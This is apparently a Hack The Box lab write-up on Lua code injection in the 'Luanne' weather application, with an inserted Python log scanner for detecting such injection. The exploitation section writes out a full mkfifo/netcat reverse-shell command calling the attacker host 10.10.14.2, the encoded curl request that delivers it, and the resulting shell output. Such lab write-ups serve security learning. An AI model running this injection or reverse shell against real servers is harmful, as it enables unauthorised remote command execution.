Lua Code Injection


I was able to discover that one of the web servers was running a weather application off a Lua script, which was later confirmed by enumerating the other web application running on port 9001.

While Lua applications are common, they can be exploited if not secured properly, just like any other application. One of the most common vulnerabilities is injection.

Injection vulnerabilities in Lua applications are most commonly found

Here is an article that lists the potential vulnerabilities present in Lua applications, along with their exploits.

Following one of the examples shown in the article doesn't seem to work, for a few reasons:

  • The <? and ?> tags are not valid syntax in a standalone Lua script file
  • It seems that the application is using a SQL-based database to store data, so the injection has to break out of the SQL query accordingly

')os.execute("id")--

  • ') closes the SQL query string
  • os.execute() is the Lua function used to inject the OS command
  • -- - comments out the rest of the SQL query

I can get code execution this way. This confirms that the value of the city parameter is embedded in an SQL query.
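From the defender's side, the injection above leaves a clear trace in the web server's access log: a quote-and-paren breakout followed by a Lua sink such as os.execute() inside the city parameter. The following Python scanner is an example added here, not code from this writeup or from the target application; it percent-decodes each query parameter (repeatedly, to catch double encoding) and flags those indicators. The log lines are constructed for the example.

```python
"""Flag Lua code-injection attempts in web access logs (added example)."""
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Lua calls that should never appear inside a request parameter value.
LUA_SINKS = re.compile(r"\b(os\.execute|io\.popen|load(?:string)?|dofile)\s*\(", re.I)
# A quote followed by a closing paren: the break-out used against the city parameter.
BREAKOUT = re.compile(r"['\"]\s*\)")

# Constructed sample lines in Combined Log Format (not captured from any host).
SAMPLE_LOG = """\
10.10.14.2 - - [26/Nov/2020:10:00:01 +0000] "GET /weather/forecast?city=London HTTP/1.1" 200 512
10.10.14.2 - - [26/Nov/2020:10:00:07 +0000] "GET /weather/forecast?city=London%27)os.execute(%27id%27)--%20- HTTP/1.1" 200 97
10.10.14.2 - - [26/Nov/2020:10:00:09 +0000] "GET /weather/forecast?city=%2527%2529os.execute%2528%2527id%2527%2529 HTTP/1.1" 500 0
"""

REQ_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

def fully_decode(value: str, rounds: int = 3) -> str:
    """Percent-decode until the value stops changing (catches double encoding)."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_params(target: str) -> list[tuple[str, str]]:
    """Return (param, decoded value) pairs that look like Lua injection."""
    hits = []
    query = urlsplit(target).query
    for name, raw in parse_qsl(query, keep_blank_values=True):
        val = fully_decode(raw)  # parse_qsl already decoded one layer
        if LUA_SINKS.search(val) or BREAKOUT.search(val):
            hits.append((name, val))
    return hits

def scan_log(text: str) -> list[dict]:
    """Scan access-log lines; return one finding dict per suspicious request."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = REQ_RE.search(line)
        if not m:
            continue
        hits = suspicious_params(m.group("target"))
        if hits:
            findings.append({"line": lineno, "target": m.group("target"), "params": hits})
    return findings

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f['line']}: {f['params']}")
```

The third sample line shows why the repeated decoding matters: a double-encoded payload passes through a single-pass filter untouched but still reaches the interpreter once the application decodes it again.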

Exploitation


┌──(kali㉿kali)-[~/archive/htb/labs/luanne]
└─$ hurl -U 'mkfifo /tmp/owntmi; nc 10.10.14.2 9999 0</tmp/owntmi | /bin/sh >/tmp/owntmi 2>&1; rm /tmp/owntmi'
 
Original    :: mkfifo /tmp/owntmi; nc 10.10.14.2 9999 0</tmp/owntmi | /bin/sh >/tmp/owntmi 2>&1; rm /tmp/owntmi
URL ENcoded :: mkfifo%20%2Ftmp%2Fowntmi%3B%20nc%2010.10.14.2%209999%200%3C%2Ftmp%2Fowntmi%20%7C%20%2Fbin%2Fsh%20%3E%2Ftmp%2Fowntmi%202%3E%261%3B%20rm%20%2Ftmp%2Fowntmi

Encoding the payload in URL format for delivery

┌──(kali㉿kali)-[~/archive/htb/labs/luanne]
└─$ curl -s 'http://10.10.10.218/weather/forecast?city=London%27)os.execute(%27mkfifo%20%2Ftmp%2Fowntmi%3B%20nc%2010.10.14.2%209999%200%3C%2Ftmp%2Fowntmi%20%7C%20%2Fbin%2Fsh%20%3E%2Ftmp%2Fowntmi%202%3E%261%3B%20rm%20%2Ftmp%2Fowntmi%27)--%20-'

Sending the payload

┌──(kali㉿kali)-[~/archive/htb/labs/luanne]
└─$ nnc 9999
listening on [any] 9999 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.218] 65444
whoami
_httpd
hostname
luanne.htb
/sbin/ifconfig
vmx0: flags=0x8843<UP,BROADCAST,RUNNING,SIMPLEX,MULTICAST> mtu 1500
	capabilities=7fd80<TSO4,IP4CSUM_Rx,TCP4CSUM_Rx,TCP4CSUM_Tx>
	capabilities=7fd80<UDP4CSUM_Rx,UDP4CSUM_Tx,TCP6CSUM_Rx,TCP6CSUM_Tx>
	capabilities=7fd80<UDP6CSUM_Rx,UDP6CSUM_Tx,TSO6>
	enabled=0
	ec_capabilities=7<VLAN_MTU,VLAN_HWTAGGING,JUMBO_MTU>
	ec_enabled=2<VLAN_HWTAGGING>
	address: 00:50:56:b9:f2:06
	media: Ethernet autoselect (10Gbase-T)
	status: active
	inet 10.10.10.218/24 broadcast 10.10.10.255 flags 0x0
	inet6 fe80::250:56ff:feb9:f206%vmx0/64 flags 0x0 scopeid 0x1
lo0: flags=0x8049<UP,LOOPBACK,RUNNING,MULTICAST> mtu 33624
	inet 127.0.0.1/8 flags 0x0
	inet6 ::1/128 flags 0x20<NODAD>
	inet6 fe80::1%lo0/64 flags 0x0 scopeid 0x2

Initial foothold established on the target system as the _httpd user via Lua code injection.